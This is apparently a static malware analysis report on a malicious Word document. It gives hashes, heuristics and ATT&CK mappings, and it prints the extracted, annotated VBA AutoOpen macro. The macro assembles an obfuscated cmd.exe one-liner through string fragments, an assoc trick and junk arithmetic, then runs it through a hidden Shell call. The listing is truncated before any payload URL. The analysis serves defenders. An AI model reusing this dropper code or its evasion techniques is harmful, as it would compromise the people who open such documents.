Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4a87e4dd7652003d…

MALICIOUS

Office (OLE)

159.6 KB Created: 2018-07-25 14:44:00 Authoring application: Microsoft Office Word First seen: 2018-11-13
MD5: 5fc7979406eeb2571e1a105a65c7132f SHA-1: 830f44b972aeea2d0b4b3dc08985644ac3052da0 SHA-256: 4a87e4dd7652003d64720d77605b3fe0f1d6abf55cb52133439ef3fbf0c584ad
Risk score: 82

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic (the AutoOpen VBA macro itself). The command string the macro assembles (`cm` + `d ... /c FOR /F ...`, see the extracted module below) also warrants T1059.003 Command and Scripting Interpreter: Windows Command Shell, and the auto-execution-on-open trigger is conventionally mapped to T1204.002 User Execution: Malicious File.

The sample is a malicious Office document whose AutoOpen macro runs automatically when the document is opened with macros enabled. (The OLE_LEGACY_WORDBASIC_AUTOEXEC heuristic fired on the AutoOpen marker, but the module carved as macros.bas is a VBA project module — note its `Attribute VB_Base = "1Normal.ThisDocument"` header — so this is modern VBA rather than WordBasic.) The macro assembles a command string and executes it with the Shell function using window style 0 (hidden console), indicating it is likely a downloader or initial execution stage. The command is obfuscated through string concatenation spread across several helper functions, junk arithmetic on undeclared variables, and `On Error Resume Next` to mask the runtime errors that junk produces, which makes full static recovery difficult. The fragments visible in the listing nevertheless reconstruct to a cmd.exe one-liner of the form `cmd /c FOR /F "delims=f1= tokens=2" %7 IN ('assoc.cmd') DO %7 /v:On /R "sEt ]+=…junk…` — a known trick that derives the word `cmd` from the output of `assoc .cmd` so it never appears literally, followed by a delayed-expansion (`/v:On`) decoder that rebuilds the next stage from a scratch string; the remainder of that string and the decoder itself fall past the truncated listing. The complete command line (and any URL it contacts) should be confirmed by dynamic analysis rather than inferred from the static fragments.

Heuristics 4

  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (Note: for this particular sample a VBA module was nevertheless carved — see macros.bas under Extracted artifacts — so the "no modern VBA project was recovered" clause of this generic description does not hold here; read the finding as confirming the AutoOpen trigger, not as WordBasic-only evidence.)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the OOXML DrawingML XML-namespace identifier carried by embedded drawing markup, not a host the sample contacts; it is not a network indicator and should not be added to IOC or block lists.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 30461 bytes
SHA-256: d32120debc50ea6b29cd140b12aff412c54ef8249176e4ed38284909321fdd19
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "YTTXDCWki"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst annotation: Word auto-execution entry point. AutoOpen runs as soon
' as the document is opened with macros enabled. The body builds an
' obfuscated command string from literals, sibling helper functions and
' undeclared variables, then launches it through Shell with a hidden window.
Sub AutoOpen()
' On Error Resume Next is load-bearing, not decoration: several of the junk
' statements below would raise (e.g. 60335 / hJIzJ divides by an Empty, i.e.
' zero, operand). Suppressing those errors is what lets execution reach Shell.
On Error Resume Next
' Dead padding: results are never read.
   ssWqj = CByte(Swnnta)
   nbBSlm = 175425377
   zJZRjd = Oct(78540955)
' Command assembly. CVar("cm") is the only literal; jWovoc(), jKpiYKX(),
' sBZNiqibZE() and snwjJ() are defined further down and return string
' fragments (jWovoc starts with "d" + "/c", so the prefix spells "cmd /c").
' Every other name in the chain is either a fragment function past the
' truncation point of this listing or an undeclared variable; with no
' Option Explicit visible in the module such names evaluate to Empty and
' contribute "" to the + concatenation.
MblHfjiJDK = "" + nmoFHCwVGZoFS + KHpMtdsQmEKCp + CVar("cm") + sLzFiErfKwpRn + WUMJHdzuCKuWB + jWovoc + jKpiYKX + sBZNiqibZE + snwjJ + QdQcmrOCM + fMXfIGzOi + KzLAHdwfH + aXwzJbl + EpzsYLpKJ + PWXDoY + UdpUKHYIzap + IBdTSRLRMz + smjcd + UAimn + RCIcYPwMoDk + PLzosrWhCv + tfPADo + UFYlIXYPX + hViRXLsw + RGrNkIjTYP + EqozjBc + pbnGidY + tSQiwOwq + qpvJZr + MGUwduTIjZ + oIirLzzlQ + UDhlGPc + CKIWpHMdtu + ApwRAtGSoZ + FhipjjiZ + zYOSz + VXZJUR + Swvza + WMRtRpmkq + rXmoFSiwl + MkjOKoim + UJMvXnCdzdi + nSciQELFPui + foLvQuvnhqiNz
   VUPNHj = 402893017
   BSiwwp = Cos(58)
' Execution of the assembled command. Second argument 0 is the WindowStyle
' (vbHide): no console window is shown to the user.
' NOTE(review): the trailing @ is a VBA Currency type-declaration character
' glued to the Shell name, presumably to defeat naive pattern matching on
' "Shell "; the report's heuristics treat this as the Shell call — confirm by
' dynamic analysis that the suffixed form is accepted and executes.
Shell@ MblHfjiJDK, 0
' Trailing junk; Sin(60335 / hJIzJ) is a division by Empty (zero) that would
' raise a runtime error, silenced by On Error Resume Next above.
   HJikG = Sin(MORsFc)
   TYTjv = Sin(60335 / hJIzJ)
End Sub


Attribute VB_Name = "vwwbjLFnBIPj"
' Analyst annotation: returns the first slice of the cmd.exe one-liner that
' AutoOpen hands to Shell. Only the string-typed locals matter; every numeric
' assignment (Atn, Fix, CInt, CDbl, Sqr, ...) is dead padding whose result is
' never read and, where it would raise, is silenced by On Error Resume Next.
' Names with no definition in the visible listing are undeclared variables
' (Empty). Live in a different module (vwwbjLFnBIPj) from AutoOpen.
Function jWovoc()
On Error Resume Next
BJdNjM = 78
' "d" + padding + "/c": appended to the CVar("cm") emitted just before this
' call in AutoOpen, this spells "cmd      /c" (extra spaces are harmless to
' cmd.exe and break naive "cmd /c" matching).
zipKjrf = "d" + "          " + "     /c   " + "       "
kAfclP = Atn(146165041)
   JLLBJ = Fix(84244 / zHHUCO - AYIGiC - 87770)
' Chr(Empty + Empty + 34 + Empty + Empty) = Chr(34) = a double quote, so this
' yields:   FOR /F "delims=f1= token   (the options string continues in
' fahcIhW). Hiding the quote behind arithmetic on undeclared names keeps the
' literal out of the source.
nDzJMPb = "  " + " " + "  FOR /F " + CStr(Chr(mjCwqtuBfwDX + jVMlwWYkwrWmY + 34 + bapXlAWBsvu + bjbAIjMu)) + "delims=f" + "1= token"
' Completes the options string and names the loop variable:
'   s=2" %7     ->   "delims=f1= tokens=2" %7
' %7 is a single-percent FOR variable because this runs from a cmd /c command
' line, not from a batch file (where %7 would be a script argument).
fahcIhW = "s=2" + CStr(Chr(NiNCnLZDVQY + NznrJUTqEs + 34 + MPWipRhU + sYwjpSrZNnW)) + " %7 "
madoaF = qXSbbB
   kkpZz = GwFwqa
' IN ('assoc.cmd'): runs the internal assoc command for the .cmd extension,
' which on a stock Windows host prints ".cmd=cmdfile". Splitting that on the
' delimiters f / 1 / = and taking token 2 is meant to hand %7 the word "cmd"
' without it ever appearing literally (signature evasion).
' NOTE(review): tokens= is placed after delims= here, and assoc is written
' with no space before .cmd — confirm the effective value of %7 in a sandbox
' rather than on paper.
twfuNnj = "IN" + " ('assoc"
aYQziw = AJFStC
   kqBES = 46
ZStjYdYij = ".cmd')"
chzMzY = CInt(PIjDQK + wtaSR * ikMwK * BRXQW)
   AmuNWz = CStr(35)
' DO %7 /v:On /R "sEt : re-invokes cmd (via %7) with delayed environment
' variable expansion enabled (/v:On) and runs the quoted command that follows.
' /R is an undocumented cmd.exe alias that behaves like /C. The mixed-case
' "sEt" is cosmetic — cmd is case-insensitive — and exists to dodge naive
' matching on "set ".
ZOlXANCBV = "DO %7" + " " + "/v:On  " + "  /R  " + CStr(Chr(AVrDanoJm + bvCZjwqkclGOt + 34 + AwfiYmABWIz + jGSGYEIu)) + "sEt"
rrJaQ = 570
   XAzkA = CInt(71084 - DlVEJf - qAnDfC * sUACw)
   vvqShr = Sqr(zruAVG)
' Start of the sEt argument. "    ]+=" presumably names the variable (]+)
' and everything after the = is a run of / \ - _ and space characters. With
' /v:On in effect this looks like the scratch string from which the real
' command is later rebuilt by !var:~offset,length! substring extraction; the
' extraction half is beyond the truncated listing, so the final command
' cannot be recovered from this page alone.
ZpXDv = "    ]+=_/" + "/_-\-\_\-/" + "-_\ /\"
BNUMtL = 113
   TwzQfj = CDbl(774)
LOrMjzD = "_-" + "/\//-" + "_\-\__ \\-" + "--/-/\\/__"
MuFwlw = 431
awSJZRIqnT = "_/ /_\-\/\" + "--_//-__ -" + "_\/-/" + "_-_-//_\\" + " -\/__\"
DKpKjF = "\/\//--"
' Only the string fragments are returned, in command order; the numeric
' locals above are discarded.
jWovoc = zipKjrf + nDzJMPb + fahcIhW + twfuNnj + ZStjYdYij + ZOlXANCBV + ZpXDv + LOrMjzD + awSJZRIqnT + DKpKjF
   dFBdQh = OqdSU
End Function
' Analyst annotation: second fragment of the sEt value begun in jWovoc() —
' more of the / \ - _ scratch string. Every non-string assignment is dead
' padding whose result is never read; the ones that divide by, or take the
' logarithm of, an undeclared (Empty, i.e. zero) operand would raise and are
' silenced by On Error Resume Next.
Function jKpiYKX()
On Error Resume Next
YznriU = CLng(bZIfH)
   GauhR = hznmmD
   IRTXTF = Cos(2)
XsivJl = "-" + "_ \_" + "/__/_\" + "-\-" + "//-\" + " -_\/_"
hQMGcs = Tan(236531222)
   nKnzpv = VACiJ
uElPS = "---\\\/" + "//_ -" + "/\/"
aLPiAl = Cos(5473)
CrnUZnIPIn = "_-_-_\" + "/_\-\ _/-"
' 4006 / VbmpwL is a division by Empty (zero): runtime error, swallowed.
NSzczF = Oct(4006 / VbmpwL - 39578 - ssTALb)
kzkJjGkIBDu = "/_/_/\_" + "\" + "\" + "--\ /\/" + "\/--_-/_" + "_\\- -/__"
iZaMLKjW = "-\/" + "-\/" + "_-_/"
pvNfFR = Atn(9423)
   MmZQBk = Chr(5)
wFVfAzdALK = "\ \-\/--" + "\_" + "_/_/" + "-_/ //\-" + "\---/_\\_" + "_/ \-" + "\"
wtmTc = TrnzH
   Xvzliz = CSng(hItiKj)
mFPfB = "_--_///"
' Only the string fragments are concatenated into the return value.
jKpiYKX = XsivJl + uElPS + CrnUZnIPIn + kzkJjGkIBDu + iZaMLKjW + wFVfAzdALK + mFPfB
' Log(Empty) = Log(0) also raises; again swallowed and never read.
   tqQhJI = Log(jLinb)
   naMwU = Oct(OGzin)
End Function
' Analyst annotation: third fragment of the sEt scratch string. Note the "}"
' and "{" characters embedded in lEEBCBhbi and SNBTK — the only characters in
' this chunk besides / \ - _ and spaces. Whether they are meaningful to the
' cmd-side decoder or just alphabet noise cannot be determined from the
' truncated listing. Numeric locals are dead padding.
Function sBZNiqibZE()
On Error Resume Next
AXQzHD = 9
   JoWio = Hex(VTVNM * vpwEjw)
UiBOcAG = "\_" + "_"
TwZItP = HdndDm
   ZUwAKz = CByte(LEqSY)
PZYUZGuEVM = "\- _\" + "/__-\///--" + "\"
srpSVEvB = "\_ \--_" + "_//\" + "-\_/\_- " + "_\"
lhtXwt = Sin(31491 + lsnsbI * CicwB - upMURq)
lEEBCBhbi = "-/_" + "//" + "_--\\" + "-" + "/\}/-" + "\_\/-\/" + "--/__"
SNBTK = "_}-/\-\" + "/__\-" + "/\__-" + "{_/-\\/_\" + "_//-" + "_--"
' Return value is the string fragments only, in order.
sBZNiqibZE = UiBOcAG + PZYUZGuEVM + srpSVEvB + lEEBCBhbi + SNBTK
' 2033 / hfVUaZ divides by Empty (zero) and would raise; suppressed by
' On Error Resume Next. Neither result is read.
   wwajrX = CBool(2033 / hfVUaZ)
   KlmdF = Cos(53)
End Function
Function snwjJ()
On Error Resume Next
kMXmSUsjV = "h\" + "/\" + "-\\-___" + "/-/_"
UfuFm = "/c/\-\-_\/"
ETkluERj = "_-/_-\_t_\" + "_" + "-/\/\_/_" + "\---" + "a\_//\__-" + "\---\/" + "_"
iPTwPKzikZi = "c\//"
HKihC = 2007
   sqshD = 8874
EYIDaXO = "/-" + "__" + "-\-\-__/}/" + "---_\/_" + "/\_/"
snwjJ = kMXmSUsjV + UfuFm + ETkluERj + iPTwPKzikZi + EYIDaXO
   owhAJ = ChrB(27808 * OrzvUX)
   hXfdW = Rnd(qWnkm)
E
... (truncated)